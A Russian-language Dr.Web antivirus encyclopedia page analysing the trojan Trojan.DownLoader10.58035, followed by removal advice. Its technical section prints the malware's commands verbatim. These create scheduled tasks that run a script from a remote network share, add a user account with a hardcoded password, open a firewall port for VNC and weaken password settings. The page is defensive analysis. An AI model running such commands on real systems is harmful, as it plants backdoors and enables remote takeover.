Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.DownLoader10.58035

Добавлен в вирусную базу Dr.Web: 2013-12-03

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Создает или изменяет следующие файлы:
  • %WINDIR%\Tasks\Backup Central - kill.job
Вредоносные функции:
Запускает на исполнение:
  • '<SYSTEM32>\ping.exe' -n 1 -i 1 -w 1 www.microsoft.com
  • '<SYSTEM32>\arp.exe' -a
  • '<SYSTEM32>\schtasks.exe' /delete /tn "Backup Central" /F
  • '<SYSTEM32>\schtasks.exe' /delete /tn "Backup Central - kill 2" /F
  • '<SYSTEM32>\schtasks.exe' /create /tn "Backup Central - kill" /tr "<SYSTEM32>\TASKKILL.exe /F /fi \"USERNAME eq Sysadmin\" /T" /sc weekly /d "MON TUE WED THU FRI SAT" /st 06:00:00 /s CRNJEUFU /ru Sysadmin /rp Bartle1944
  • '<SYSTEM32>\find.exe' "Interface"
  • '<SYSTEM32>\schtasks.exe' /change /tn "Update Hosts" /RL "HIGHEST" /RP "Bartle1944"
  • '<SYSTEM32>\schtasks.exe' /change /tn "Check Hard Disk" /RL "HIGHEST" /RP "Bartle1944"
  • '<SYSTEM32>\schtasks.exe' /change /tn "Defragmentation" /RL "HIGHEST" /RP "Bartle1944"
  • '<SYSTEM32>\schtasks.exe' /create /F /tn "Misc Tasks" /tr "\\128.1.1.250\scripts\misc.bat" /sc weekly /d "MON TUE WED THU FRI SAT" /st 17:26:00 /s CRNJEUFU /ru Sysadmin /rp Bartle1944
  • '<SYSTEM32>\schtasks.exe' /change /tn "Misc Tasks" /RL "HIGHEST" /RP "Bartle1944"
  • '<SYSTEM32>\powercfg.exe' /change "Always On" /disk-timeout-ac 0 /standby-timeout-ac 0 /hibernate-timeout-ac 0
  • '<SYSTEM32>\netsh.exe' firewall set portopening protocol=TCP port=5900 name=UVNC mode=ENABLE profile=All
  • '<SYSTEM32>\powercfg.exe' /setactive "Always On"
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\rsyn.bat" "
  • '<SYSTEM32>\powercfg.exe' /change "49ef8fc0-bb7f-488e-b6a0-f1fc77ec649b" /disk-timeout-ac 0 /standby-timeout-ac 0 /hibernate-timeout-ac 0
  • '<SYSTEM32>\net1.exe' ACCOUNTS /MAXPWAGE:UNLIMITED
  • '<SYSTEM32>\schtasks.exe' /delete /tn "Backup Central - kill" /F
  • '<SYSTEM32>\schtasks.exe' /delete /tn "Backup Central kill" /F
  • '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\Parameters" /v EnablePlainTextPassword /t REG_DWORD /d 1 /f
  • '<SYSTEM32>\net1.exe' User SysAdmin Bartle1944 /add
  • '<SYSTEM32>\net1.exe' User SysAdmin Bartle1944
Изменения в файловой системе:
Создает следующие файлы:
  • C:\ip1.txt
  • %TEMP%\1.tmp\rsyn.bat
Удаляет следующие файлы:
  • %TEMP%\1.tmp\rsyn.bat
  • C:\ip1.txt
Сетевая активность:
Подключается к:
  • '12#.1.1.250':80
  • '12#.1.1.250':445
UDP:
  • DNS ASK www.microsoft.com

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке